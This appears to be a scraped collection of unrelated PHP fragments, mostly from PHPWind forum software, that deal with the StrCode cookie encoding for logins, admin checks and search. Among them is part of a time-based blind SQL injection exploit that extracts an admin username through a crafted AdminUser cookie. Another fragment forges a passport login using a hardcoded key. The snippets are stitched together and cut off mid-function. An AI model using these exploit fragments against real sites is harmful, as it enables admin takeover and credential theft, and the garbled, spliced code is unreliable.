function synlogin($user) { global $timestamp, $uc_key; list($winduid, $windid, $windpwd) = explode("\t", $this->base->strcode($user, false)); header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"'); $safecv = ''; $cktime = 31536000; $cktime != 0 && ($cktime += $timestamp); Cookie("winduser", StrCode($winduid . "\t" . PwdCode($windpwd) . "\t" . $safecv), $cktime); Cookie("ucuser", StrCode($winduid . "\t" . md5($uc_key . $windpwd)), $cktime); Cookie('lastvisit', '', 0); return ''; }
/** *取得用户数据 **/ function PassportUserdb() { global $db, $timestamp, $webdb, $onlineip, $TB, $pre, $db_ifsafecv, $userDB; list($lfjuid, $lfjpwd, $safecv) = explode("\t", StrCode(GetCookie('winduser'), 'DECODE')); if (!$lfjuid || !$lfjpwd) { return ''; } if ($db_ifsafecv) { $SQL = ",M.safecv"; } $detail = $userDB->get_allInfo($lfjuid); if (PwdCode($detail[password]) != $lfjpwd || $db_ifsafecv && $safecv != $detail['safecv']) { return; } return $detail; }
function synlogin($user) { global $timestamp, $uc_key; list($winduid, $windid, $windpwd) = explode("\t", $this->base->strcode($user, false)); header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"'); $safecv = ''; $cktime = 31536000; $cktime != 0 && ($cktime += $timestamp); Cookie("winduser", StrCode($winduid . "\t" . PwdCode($windpwd) . "\t" . $safecv), $cktime); Cookie("ucuser", StrCode($winduid . "\t" . md5($uc_key . $windpwd)), $cktime); Cookie('lastvisit', '', 0); //鑾峰彇鍕嬬珷_start require_once R_P . 'require/functions.php'; doMedalBehavior($winduid, 'continue_login'); //鑾峰彇鍕嬬珷_end return ''; }
function wap_login($username, $password, $safecv, $lgt = 0) { global $db, $timestamp, $onlineip, $db_ckpath, $db_ckdomain, $db_bbsurl, $db_ifsafecv; $men = $db->get_one("SELECT m.uid,m.password,m.safecv,m.groupid,m.yz,md.onlineip FROM pw_members m LEFT JOIN pw_memberdata md ON md.uid=m.uid WHERE m." . ($lgt ? 'uid' : 'username') . "=" . pwEscape($username)); if ($men) { $e_login = explode("|", $men['onlineip']); if ($e_login[0] != $onlineip . ' *' || $timestamp - $e_login[1] > 600 || $e_login[2] > 1) { $men_uid = $men['uid']; $men_pwd = $men['password']; $check_pwd = $password; if ($men['yz'] > 2) { wap_msg('login_jihuo'); } if (strlen($men_pwd) == 16) { $check_pwd = substr($password, 8, 16); /*支持 16 位 md5截取密码*/ } if ($men_pwd == $check_pwd && (!$db_ifsafecv || $men['safecv'] == $safecv)) { if (strlen($men_pwd) == 16) { $db->update("UPDATE pw_members SET password="******" WHERE uid=" . pwEscape($men_uid)); } $L_groupid = (int) $men['groupid']; Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain); } else { global $L_T; $L_T = $e_login[2]; $L_T ? $L_T-- : ($L_T = 5); $F_login = "******"; $db->update("UPDATE pw_memberdata SET onlineip=" . pwEscape($F_login) . " WHERE uid=" . pwEscape($men_uid)); wap_msg('login_pwd_error'); } } else { global $L_T; $L_T = 600 - ($timestamp - $e_login[1]); wap_msg('login_forbid'); } } else { global $errorname; $errorname = $username; wap_msg('user_not_exists'); } Cookie("winduser", StrCode($men_uid . "\t" . PwdCode($password) . "\t" . $safecv)); Cookie('lastvisit', '', 0); wap_msg('wap_login', 'index.php'); }
function API_Login($user, $pass) { global $Block, $setting, $onlineip, $_COOKIE, $_SERVER; $pwd = md5($pass); $user = Conn()->record("members", "uid,username,password,safecv", "username='******' and password='******'"); if (!$user) { return false; } $winduid = $user[0]['uid']; $windpwd = md5($_SERVER['HTTP_USER_AGENT'] . $pwd . $GLOBALS['db_hash']); $safecv = $user[0]['safecv']; $username = $user[0]['username']; $winduser = StrCode(stripSlashes("{$winduid}\t{$windpwd}\t{$safecv}"), "ENCODE"); $GLOBALS['cookiepre'] = substr(md5($GLOBALS['db_sitehash']), 0, 5) . '_'; osetcookie('winduser', $winduser, 31536000); osetcookie('ck_info', $GLOBALS['db_ckpath'] . "\t" . $GLOBALS['db_ckdomain'], 31536000); osetcookie('lastvisit', '', 0); $GLOBALS['cookiepre'] = 'onez_'; osetcookie('userid', $winduid, 31536000); osetcookie('username', $username, 31536000); return 'Y'; }
function getSearchvalue($field, $type, $alltidtype = false, $backtype = false) { /*获取搜索结果*/ global $db_perpage, $page, $actmid, $fid, $basename; $field = unserialize(StrCode($field, 'DECODE')); $sqladd = ''; $defaultValueTableName = getActivityValueTableNameByActmid(); $fid && ($sqladd .= " {$defaultValueTableName}.fid=" . S::sqlEscape($fid)); $fielddb = PW_PostActivity::getFieldData($actmid, $type); if ($actmid) { $userDefinedTableName = getActivityValueTableNameByActmid($actmid, 1, 1); } else { $userDefinedTableName = ''; } foreach ($field as $key => $value) { if ($value) { if ($fielddb[$key]['ifdel']) { $tableName = $userDefinedTableName . '.'; } elseif ($fielddb[$key]) { $tableName = $defaultValueTableName ? $defaultValueTableName . '.' : ''; } else { continue; } if (in_array($fielddb[$key]['type'], array('number', 'radio', 'select'))) { $sqladd .= $sqladd ? " AND " . $tableName . $fielddb[$key]['fieldname'] . "=" . S::sqlEscape($value) : $tableName . $fielddb[$key]['fieldname'] . "=" . S::sqlEscape($value); } elseif ($fielddb[$key]['type'] == 'checkbox') { $checkboxs = ''; foreach ($value as $cv) { $checkboxs .= $checkboxs ? ',' . $cv : $cv; } $value = '%,' . $checkboxs . ',%'; $sqladd .= $sqladd ? " AND " . $tableName . $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")" : $tableName . $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")"; } elseif ($fielddb[$key]['type'] == 'calendar') { $value && ($value = PwStrtoTime($value)); if (strpos($fielddb[$key]['fieldname'], 'start') !== false) { $sqladd .= $sqladd ? " AND " . $tableName . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value) : $tableName . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value); } elseif (strpos($fielddb[$key]['fieldname'], 'end') !== false) { $starttimeFlag = substr($fielddb[$key]['fieldname'], 0, -7) . 'starttime'; if ($value <= PwStrtoTime($field[$starttimeFlag]) && $field[$starttimeFlag]) { Showmsg('calendar_error'); } $sqladd .= $sqladd ? " AND " . $tableName . $starttimeFlag . "<=" . S::sqlEscape($value) : $tableName . $starttimeFlag . "<=" . S::sqlEscape($value); } else { $sqladd .= $sqladd ? " AND " . $tableName . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['start']) . " AND " . $tableName . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['end']) : $tableName . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['start']) . " AND " . $tableName . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['end']); } } elseif (in_array($fielddb[$key]['type'], array('text', 'url', 'email', 'textarea'))) { $value = '%' . $value . '%'; $sqladd .= $sqladd ? " AND " . $tableName . $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")" : $tableName . $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")"; } elseif ($fielddb[$key]['type'] == 'range' && $value['min'] && $value['max']) { $sqladd .= $sqladd ? " AND " . $tableName . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['min']) . " AND " . $tableName . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['max']) : $tableName . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['min']) . " AND " . $tableName . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['max']); } else { $sqladd .= ''; } } } if ($sqladd) { !$page && ($page = 1); $start = ($page - 1) * $db_perpage; $limit = S::sqlLimit($start, $db_perpage); $actmidSql = $actmid ? "AND actmid=" . S::sqlEscape($actmid) : ''; $sqladd .= $sqladd ? " AND {$defaultValueTableName}.ifrecycle=0 " . $actmidSql : " {$defaultValueTableName}.ifrecycle=0 " . $actmidSql; $count = $this->db->get_value("SELECT COUNT(*) as count FROM {$defaultValueTableName} " . ($userDefinedTableName ? "LEFT JOIN {$userDefinedTableName} USING (tid)" : "") . " WHERE {$sqladd}"); $query = $this->db->query("SELECT tid \n\t\t\t\t\t\t\t\t\tFROM {$defaultValueTableName} " . ($userDefinedTableName ? "LEFT JOIN {$userDefinedTableName} USING (tid)" : "") . " \n\t\t\t\t\t\t\t\t\tWHERE {$sqladd} {$limit}"); while ($rt = $this->db->fetch_array($query)) { $tiddb[] = $rt['tid']; } if ($alltidtype) { $query = $this->db->query("SELECT tid FROM {$defaultValueTableName} " . ($userDefinedTableName ? "LEFT JOIN {$userDefinedTableName} USING (tid)" : "") . " WHERE {$sqladd}"); while ($rt = $this->db->fetch_array($query)) { $alltiddb[] = $rt['tid']; } } !$count && ($count = -1); } else { if ($backtype) { adminmsg('topic_search_none', "{$basename}&action=topic&actmid={$actmid}"); } Showmsg('topic_search_none'); } return array($count, $tiddb, $alltiddb); }
if ($i == 255) { die("\nExploit failed..."); } } $j++; } $j = 1; $admin = ""; while (!strstr($admin, chr(0))) { for ($i = 0; $i <= 255; $i++) { $sql = "9999999'/**/OR/**/(IF((ASCII(SUBSTRING(username," . $j . ",1))=" . $i . "),benchmark(" . $b . ",char(0)),-1))/**/AND/**/groupid=3/**/LIMIT/**/1/*"; echo "sql -> " . $sql . "\n"; $packet = "GET " . $p . "admin.php HTTP/1.0\r\n"; $packet .= "CLIENT-IP: 1.2.3.4\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Cookie: " . $cp . "AdminUser="******"9999999999\t" . $sql, "ENCODE") . ";\r\n"; $packet .= "Accept: text/plain\r\n"; $packet .= "Connection: Close\r\n\r\n"; $packet .= $data; sendpacketii($packet); usleep(2000000); $starttime = time(); echo "starttime -> " . $starttime . "\r\n"; sendpacketii($packet); $endtime = time(); echo "endtime -> " . $endtime . "\r\n"; $difftime = $endtime - $starttime; echo "difftime -> " . $difftime . "\r\n"; if ($difftime > $timeout) { $admin .= chr($i); echo "admin -> " . $admin . "[???]\r\n";
function cookie($code) { global $timestamp; Cookie('cknum', StrCode($timestamp . "\t\t" . md5($code . $timestamp))); }
$searchhtml .= '</span>'; $asearchhtml .= '</span>'; if (strpos($searchhtml, '</span></span>') !== false) { $searchhtml = str_replace('</span></span>', '</span>', $searchhtml); } if (strpos($asearchhtml, '</span></span>') !== false) { $asearchhtml = str_replace('</span></span>', '</span>', $asearchhtml); } $pcid = (int) $pcid; $pcvaluetable = GetPcatetable($pcid); } if ($step == 'search') { require_once R_P . 'lib/postcate.class.php'; $searchPostcate = new postCate($field); if (!$newfield) { $newfield = StrCode(serialize($field)); } list($count, $tiddb, $alltiddb) = $searchPostcate->getSearchvalue($newfield, 'one', true, true); is_array($tiddb) && ($sql .= " AND pv.tid IN(" . pwImplode($tiddb) . ")"); is_array($alltiddb) && ($alltids = implode(',', $alltiddb)); } if ($step != 'search' || !$count) { $alltiddb = $threadb = $newtiddb = array(); $alltiddb = array(); $query = $db->query("SELECT tid FROM {$pcvaluetable} WHERE ifrecycle=0"); while ($rt = $db->fetch_array($query)) { $alltiddb[] = $rt['tid']; } if ($alltiddb) { $query = $db->query("SELECT tid FROM pw_threads WHERE tid IN(" . pwImplode($alltiddb) . ")"); while ($rt = $db->fetch_array($query)) {
$db->free_result($query); } unset($toptids, $L, $limit, $toppeddb); } else { list($st, $lt, $asc, $R) = getstart($start_limit - $rows, $asc, $count); $limit2 = S::sqlLimit($st, $lt); } unset($rows); } else { list($st, $lt, $asc, $R) = getstart($start_limit, $asc, $count); $limit2 = S::sqlLimit($st, $lt); } if ($limit2) { if ($topicsearch == 1) { S::gp(array('searchname', 'new_searchname')); $searchname && ($new_searchname = StrCode(serialize($searchname))); if ($modelid > 0) { list($count, $tiddb, $alltiddb) = $postTopic->getSearchvalue($new_searchname, 'one', true); } elseif ($pcid > 0) { list($count, $tiddb, $alltiddb) = $postCate->getSearchvalue($new_searchname, 'one', true); } if ($tiddb) { $query = $db->query("SELECT * FROM pw_threads WHERE tid IN (" . S::sqlImplode($tiddb) . ")"); $urladd = "&topicsearch=1&new_searchname={$new_searchname}"; while ($thread = $db->fetch_array($query)) { $tpcdb[] = $thread; } $db->free_result($query); } } else { $topadd && ($topadd .= $R ? ' ASC,' : ' DESC,');
/** * 会员唯一有效登录验证字串解密 * @param string $token 有效登录验证字串 * @param int $curtimes 当前该字串已经登录访问次数 * @return mixed 验证通过则返回有效字串,否则返回FALSE */ function deWindToken($token, $curtimes = 60) { $token = StrCode($token, 'DECODE'); list($expire, $times, $code, $md5word) = explode("\t", $token); if (substr(md5($expire . $code . $times), 8, 18) === $md5word && $times >= $curtimes && $expire >= time() && $code) { return addslashes($code); } return ''; }
/** * 用户接口,退出处理 * * @param array $params 参数数组 * 必须参数: $params['username'] - 用户名,$params['password'] - 密码,$params['email'] - 邮箱 * @access public * @return int */ function jieqi_ulogout_iprocess(&$params) { //赋值 $userdb['uid'] = $_SESSION['jieqiUserId']; //用户编号 $userdb['username'] = $_SESSION['jieqiUserUname']; //用户名 $userdb['password'] = ''; //密码 $userdb['email'] = $_SESSION['jieqiUserEmail']; //邮箱 /* $userdb['rvrc'] = $params['rvrc'];//威望 $userdb['money'] = $params['money'];//铜币 $userdb['credit'] = $params['credit'];//贡献值 $userdb['currency'] = $params['currency'];//银元 */ $userdb['time'] = time(); //时间 $userdb['cktime'] = 'F'; if (!empty($_REQUEST['forward'])) { $params['jumpurl'] = $_REQUEST['forward']; } //字符串化用户基本信息 $userdb_encode = ''; foreach ($userdb as $key => $val) { $userdb_encode .= $userdb_encode ? "&{$key}={$val}" : "{$key}={$val}"; } //加密数据 $userdb_encode = str_replace('=', '', StrCode($userdb_encode)); //加密字串 $verify = md5('quit' . $userdb_encode . $params['jumpurl'] . PHPWIND_PASSPORT_KEY); header('Location: ' . PHPWIND_PASSPORT_URL . '/passport_client.php?action=quit&userdb=' . rawurlencode($userdb_encode) . '&forward=' . rawurlencode($params['jumpurl']) . '&verify=' . rawurlencode($verify)); return true; }
function cookie($code) { global $timestamp; Cookie('cknum', StrCode($timestamp . "\t\t" . md5($code . $timestamp . getHashSegment()))); }
$forward = isset($_POST['forward']) ? $_POST['forward'] : $_GET['forward']; $verify = isset($_POST['verify']) ? $_POST['verify'] : $_GET['verify']; $forward = str_replace('=', '=', $forward); $config['phpwind'] = jconf::get('phpwind'); $key = $config['phpwind']['pw_pptkey']; if (md5($action . $userdb . urldecode($forward) . $key) == $verify) { $config = jconf::get(); $db_charset = strtolower(str_replace('-', '', $config['charset'])); if (!defined('JSG_DB_CHARSET')) { define("JSG_DB_CHARSET", $db_charset); } $db_prefix = $config['db_table_prefix']; if (!defined('JSG_DB_PRE')) { define("JSG_DB_PRE", $db_prefix); } parse_str(StrCode($userdb, $key, 'DECODE'), $userdb); if ($action == 'login') { $userdb = escapeChar($userdb); if (is_array($userdb) && $userdb['username'] && $userdb['password']) { synlogin($userdb['username'], $userdb['password']); } } if ($action == 'quit') { synlogout(); } } header('Location: ' . $forward); exit; function escapeChar($mixed, $isint = false, $istrim = false) { if (is_array($mixed)) {
function processLogin($userId, $user = null, $cktime = '31536000', $lgt = 0) { global $timestamp, $db_ckpath, $db_ckdomain, $db_autoban; if (!$user) { $userService = L::loadClass('UserService', 'user'); /* @var $userService PW_UserService */ $user = $userService->get($userId, true, true); } $pwuser = $user['username']; $md5_pwpwd = $user['password']; $safecv = $user['safecv']; require_once R_P . 'require/checkpass.php'; $logininfo = checkpass($pwuser, $md5_pwpwd, $safecv, $lgt); if (!is_array($logininfo)) { Showmsg($logininfo); } list($winduid, , $windpwd, ) = $logininfo; /*update cache*/ $_cache = getDatastore(); $_cache->delete("UID_" . $winduid); $cktime != 0 && ($cktime += $timestamp); Cookie("winduser", StrCode($winduid . "\t" . $windpwd . "\t" . $safecv), $cktime); Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain); Cookie('lastvisit', '', 0); //将$lastvist清空以将刚注册的会员加入今日到访会员中 //自动获取勋章_start require_once R_P . 'require/functions.php'; doMedalBehavior($winduid, 'continue_login'); //自动获取勋章_end if ($db_autoban) { require_once R_P . 'require/autoban.php'; autoban($winduid); } return $logininfo; }
/** * 校验验证问题 * @param $anser 答案 * @param $question 问题 * @return int */ function checkQanswer($answer, $question) { global $db_answer; if (!$question || $question > 0 && $answer != $db_answer[$question] || $question < 0 && !SafeCheck(explode("\t", StrCode(GetCookie('ckquestion'), 'DECODE')), $answer, 'ckquestion', 1800, false, false)) { return 1; } else { return 0; } }
//[fix]:http://www.phpwind.net/read-htm-tid-392683.html //CODE IN require\defend.php[line 8-15] //foreach($_GET as $_key=>$_value){ // !ereg("^\_",$_key) && !isset($$_key) && $$_key=$_GET[$_key]; //} //$passport_ifopen = $passport_type = $passport_key = ''; //<--------here!!!! //require_once(D_P.'data/bbscache/config.php'); //if($db_forcecharset && !defined('W_P')){ // @header("Content-Type: text/html; charset=$db_charset"); //} //////////////////////////////////////////////////// $passwod = '123456789'; $passport_key = '6f0xuRI8Cd8iga'; $forward = " http://localhost/PHPWind5.0.1/upload/index.php"; $userdb = "time=99999999999999999&username=heige111&password="******"passport_client.php?passport_type=client&passport_ifopen=1&action=login&forward=" . urlencode($forward) . "&passport_key=" . $passport_key . "&verify=" . $verify . "&userdb=" . urlencode($userdb); function StrCode($string, $action = 'ENCODE') { $GLOBALS['db_hash'] = '6f0xuRI8Cd8iga'; $key = substr(md5($_SERVER["HTTP_USER_AGENT"] . $GLOBALS['db_hash']), 8, 18); //$key = '6f0xuRI8Cd8iga'; [当时误把$key当作了$passport_key] $string = $action == 'ENCODE' ? $string : base64_decode($string); $len = strlen($key); $code = ''; for ($i = 0; $i < strlen($string); $i++) { $k = $i % $len; $code .= $string[$i] ^ $key[$k]; } $code = $action == 'DECODE' ? $code : base64_encode($code);
} //update meminfo if ($upmeminfo) { updateThreadTrade($upmeminfo, $winduid); } unset($upmemdata, $upmeminfo); $result = $userService->update($winduid, $pwSQL); // defend start CloudWind::yunUserDefend('editprofile', $winduid, $windid, $upmemdata['pwdctime'], 0, 101, '', '', '', array('profile' => array_keys($pwSQL))); // defend end /* platform weibo app */ $siteBindService = L::loadClass('WeiboSiteBindService', 'sns/weibotoplatform/service'); /* @var $siteBindService PW_WeiboSiteBindService */ if ($siteBindService->isOpen() && $upmembers['password']) { $weiboLoginService = L::loadClass('WeiboLoginService', 'sns/weibotoplatform/service'); /* @var $weiboLoginService PW_WeiboLoginService */ $weiboLoginService->setLoginUserPasswordHasReset($winduid); Cookie("winduser", StrCode($winduid . "\t" . PwdCode($upmembers['password']) . "\t" . $upmembers['safecv'])); Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain); Cookie('lastvisit', '', 0); //自动获取勋章_start require_once R_P . 'require/functions.php'; doMedalBehavior($winduid, 'continue_login'); //自动获取勋章_end } //* $_cache = getDatastore(); //* $_cache->delete('UID_'.$winduid); initJob($winduid, "doUpdatedata"); refreshto("profile.php?action=modify&info_type={$info_type}", 'operate_success', 2, true); } }
} else { pwCache::setData(D_P . 'data/bbscache/ip_cache.php', "<?php die;?><{$timestamp}>\n<{$onlineip}>"); } } //addonlinefile(); if (GetCookie('userads') && $inv_linkopen && $inv_linktype == '1') { require_once R_P . 'require/userads.php'; } if (GetCookie('o_invite') && $db_modes['o']['ifopen'] == 1) { list($o_u, $hash, $app) = explode("\t", GetCookie('o_invite')); if (is_numeric($o_u) && strlen($hash) == 18) { require_once R_P . 'require/o_invite.php'; } } if ($rgyz == 1) { Cookie("winduser", StrCode($winduid . "\t" . PwdCode($windpwd) . "\t" . $safecv)); Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain); Cookie('lastvisit', '', 0); //将$lastvist清空以将刚注册的会员加入今日到访会员中 /*连续登录天数*/ if ($db_md_ifopen) { require_once R_P . 'require/functions.php'; doMedalBehavior($winduid, 'continue_login'); } } //发送短消息 if ($rg_config['rg_regsendmsg']) { $rg_config['rg_welcomemsg'] = str_replace('$rg_name', $regname, $rg_config['rg_welcomemsg']); M::sendNotice(array($windid), array('title' => "Welcome To[{$db_bbsname}]!", 'content' => $rg_config['rg_welcomemsg'])); } //发送邮件
<?php !defined('P_W') && exit('Forbidden'); if (empty($detail) && GetCookie('ucuser')) { require_once R_P . 'uc_client/uc_client.php'; list($winduid, $md5pwd) = explode("\t", addslashes(StrCode(GetCookie('ucuser'), 'DECODE'))); $detail = uc_user_check($winduid, $md5pwd); } if ($detail['uid'] > 0) { $register = L::loadClass('Register', 'user'); $register->appendUser($detail['uid'], $detail['username'], $detail['password'], $detail['email']); $detail = getUserByUid($detail['uid']); }
function weiboResetUserPassword($userId, $password, $repeatPassword) { global $db_ckpath, $db_ckdomain; if ('' == $password || '' == $repeatPassword) { Showmsg('创建密码不能为空'); } $rg_config = L::reg(); list($rg_regminpwd, $rg_regmaxpwd) = explode("\t", $rg_config['rg_pwdlen']); $register = L::loadClass('Register', 'user'); $register->checkPwd($password, $repeatPassword); $weiboLoginService = L::loadClass('WeiboLoginService', 'sns/weibotoplatform/service'); /* @var $weiboLoginService PW_WeiboLoginService */ $isSuccess = $weiboLoginService->resetLoginUserPassword($userId, $password); if (!$isSuccess) { return false; } $userService = L::loadClass('UserService', 'user'); /* @var $userService PW_UserService */ $user = $userService->get($userId); Cookie("winduser", StrCode($userId . "\t" . PwdCode($user['password']) . "\t" . $user['safecv'])); Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain); Cookie('lastvisit', '', 0); //自动获取勋章_start require_once R_P . 'require/functions.php'; doMedalBehavior($userId, 'continue_login'); //自动获取勋章_end return true; }
<?php !function_exists('readover') && exit('Forbidden'); $bbsclose = true; $AdminUser = GetCookie('AdminUser'); $CK = $AdminUser ? explode("\t", StrCode(GetCookie('AdminUser'), 'DECODE')) : array(); if (S::inArray($CK[1], $manager)) { $v_key = array_search($CK[1], $manager); SafeCheck($CK, PwdCode($manager_pwd[$v_key])) && ($bbsclose = false); } if (!$db_bbsifopen) { if ($_GET['logined'] && !$bbsclose) { Cookie('logined', 1, $timestamp + 1800); } elseif (!GetCookie('logined') || $bbsclose) { $skin = $skinco ? $skinco : $db_defaultstyle; $groupid = ''; Showmsg($db_whybbsclose, $bbsclose ? NULL : 'bbsclose'); } } elseif ($db_bbsifopen == 2) { if ($db_visitopen) { $tmpAllowvisit = false; if ($db_visitips && $onlineip != 'Unknown') { $tmpIP = ip2long($onlineip); if ($tmpIP != -1 && $tmpIP !== FALSE) { $tmpVisitips = explode(',', $db_visitips); foreach ($tmpVisitips as $value) { if (!trim($value)) { continue; } $tmpSIP = ip2long(str_replace('*', '1', $value)); $tmpEIP = ip2long(str_replace('*', '255', $value));
function getSearchvalue($field, $type, $alltidtype = false, $backtype = false) { /*获取搜索结果*/ global $db_perpage, $page, $modelid, $fid, $basename; $field = unserialize(StrCode($field, 'DECODE')); $sqladd = ''; $fid && ($sqladd .= " fid=" . S::sqlEscape($fid)); $fielddb = postTopic::getFieldData($modelid, $type); foreach ($field as $key => $value) { if ($value) { if (in_array($fielddb[$key]['type'], array('number', 'radio', 'select'))) { $sqladd .= $sqladd ? " AND " . $fielddb[$key]['fieldname'] . "=" . S::sqlEscape($value) : $fielddb[$key]['fieldname'] . "=" . S::sqlEscape($value); } elseif ($fielddb[$key]['type'] == 'checkbox') { $checkboxs = ''; foreach ($value as $cv) { $checkboxs .= $checkboxs ? ',' . $cv : $cv; } $value = '%,' . $checkboxs . ',%'; $sqladd .= $sqladd ? " AND " . $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")" : $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")"; } elseif ($fielddb[$key]['type'] == 'calendar' && ($value['start'] || $value['end'])) { $value['start'] && ($value['start'] = PwStrtoTime($value['start'])); $value['end'] && ($value['end'] = PwStrtoTime($value['end'])); if ($value['start'] > $value['end'] && $value['start'] && $value['end']) { Showmsg('calendar_error'); } $sqladd .= $sqladd ? " AND " . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['start']) . " AND " . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['end']) : $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['start']) . " AND " . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['end']); } elseif (in_array($fielddb[$key]['type'], array('text', 'url', 'email', 'textarea'))) { $value = '%' . $value . '%'; $sqladd .= $sqladd ? " AND " . $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")" : $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")"; } elseif ($fielddb[$key]['type'] == 'range' && $value['min'] && $value['max']) { $sqladd .= $sqladd ? " AND " . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['min']) . " AND " . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['max']) : $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['min']) . " AND " . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['max']); } else { $sqladd .= ''; } } } if ($sqladd) { !$page && ($page = 1); $start = ($page - 1) * $db_perpage; $limit = S::sqlLimit($start, $db_perpage); $tablename = GetTopcitable($modelid); $sqladd .= $sqladd ? " AND ifrecycle=0" : " ifrecycle=0"; $count = $this->db->get_value("SELECT COUNT(*) as count FROM {$tablename} WHERE {$sqladd}"); $query = $this->db->query("SELECT tid FROM {$tablename} WHERE {$sqladd} {$limit}"); while ($rt = $this->db->fetch_array($query)) { $tiddb[] = $rt['tid']; } if ($alltidtype) { $query = $this->db->query("SELECT tid FROM {$tablename} WHERE {$sqladd}"); while ($rt = $this->db->fetch_array($query)) { $alltiddb[] = $rt['tid']; } } !$count && ($count = -1); } else { if ($backtype) { adminmsg('topic_search_none', "{$basename}&action=topic&modelid={$modelid}"); } Showmsg('topic_search_none'); } return array($count, $tiddb, $alltiddb); }
$logininfo = checkpass($pwuser, $md5_pwpwd, $safecv, $lgt); if (!is_array($logininfo)) { Showmsg($logininfo); } list($winduid, $groupid, $windpwd, $showmsginfo) = $logininfo; /*update cache*/ $_cache = getDatastore(); $_cache->delete("UID_" . $winduid); if (file_exists(D_P . "data/groupdb/group_{$groupid}.php")) { require_once Pcv(D_P . "data/groupdb/group_{$groupid}.php"); } else { require_once D_P . "data/groupdb/group_1.php"; } (int) $keepyear && ($cktime = '31536000'); $cktime != 0 && ($cktime += $timestamp); Cookie("winduser", StrCode($winduid . "\t" . $windpwd . "\t" . $safecv), $cktime); Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain); //Cookie("ucuser",'cc',$cktime); Cookie('lastvisit', '', 0); //将$lastvist清空以将刚注册的会员加入今日到访会员中 if ($db_autoban) { require_once R_P . 'require/autoban.php'; autoban($winduid); } $_G['allowhide'] && $hideid ? Cookie('hideid', "1", $cktime) : Loginipwrite($winduid); (empty($jumpurl) || false !== strpos($jumpurl, $regurl)) && ($jumpurl = $db_bfn); if (GetCookie('o_invite') && $db_modes['o']['ifopen'] == 1) { list($o_u, $hash, $app) = explode("\t", GetCookie('o_invite')); if (is_numeric($o_u) && strlen($hash) == 18) { require_once R_P . 'require/o_invite.php'; }
function GdConfirm($code, $t = 1) { Cookie('cknum', '', 0); if (!$code || !SafeCheck(explode("\t", StrCode(GetCookie('cknum'), 'DECODE')), strtoupper($code), 'cknum', 300)) { global $basename, $admin_file; $t && Cookie('AdminUser', '', 0); $basename = $admin_file; adminmsg('check_error'); } }
function SafeCheck($CK, $PwdCode, $var = 'FLAdminUser', $expire = 1800) { // 验证密码 global $timestamp; $t = $timestamp - $CK[0]; if ($t > $expire || $CK[2] != md5($PwdCode . $CK[0])) { Cookie($var, '', 0); return false; } else { $CK[0] = $timestamp; $CK[2] = md5($PwdCode . $timestamp); $Value = implode("\t", $CK); ${$var} = StrCode($Value); Cookie($var, StrCode($Value)); return true; } }
!defined('P_W') && exit('Forbidden'); S::gp(array('uid')); $db_logintype = 2; require_once R_P . 'require/checkpass.php'; $id = $db->get_value("SELECT id FROM pw_userbinding WHERE uid=" . S::sqlEscape($winduid)); $user = $db->get_one("SELECT s.password,m.uid,m.safecv FROM pw_userbinding s LEFT JOIN pw_members m ON s.uid=m.uid WHERE s.id=" . S::sqlEscape($id) . ' AND s.uid=' . S::sqlEscape($uid)); $logininfo = checkpass($user['uid'], $user['password'], $user['safecv'], 1); if (!is_array($logininfo)) { switch ($logininfo) { case 'login_forbid': case 'login_pwd_error': Showmsg('switchuser_error'); default: Showmsg($logininfo); } } list($winduid, $groupid, $windpwd, $showmsginfo) = $logininfo; $cktime = 7 * 24 * 3600; (int) $keepyear && ($cktime = 31536000); $cktime != 0 && ($cktime += $timestamp); Cookie("winduser", StrCode($winduid . "\t" . $windpwd . "\t" . $user['safecv']), $cktime); Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain); //Cookie("ucuser",'cc',$cktime); Cookie('lastvisit', '', 0); //鑾峰彇鍕嬬珷_start require_once R_P . 'require/functions.php'; doMedalBehavior($winduid, 'continue_login'); //鑾峰彇鍕嬬珷_end echo "ok\t{$showmsginfo}"; ajax_footer();
function SafeCheck($CK, $PwdCode, $var = 'AdminUser', $expire = 1800) { global $timestamp; if ($timestamp - $CK[0] > $expire || $CK[2] != md5($PwdCode . $CK[0])) { Cookie($var, '', 0); return false; } $CK[0] = $timestamp; $CK[2] = md5($PwdCode . $CK[0]); Cookie($var, StrCode(implode("\t", $CK))); return true; }
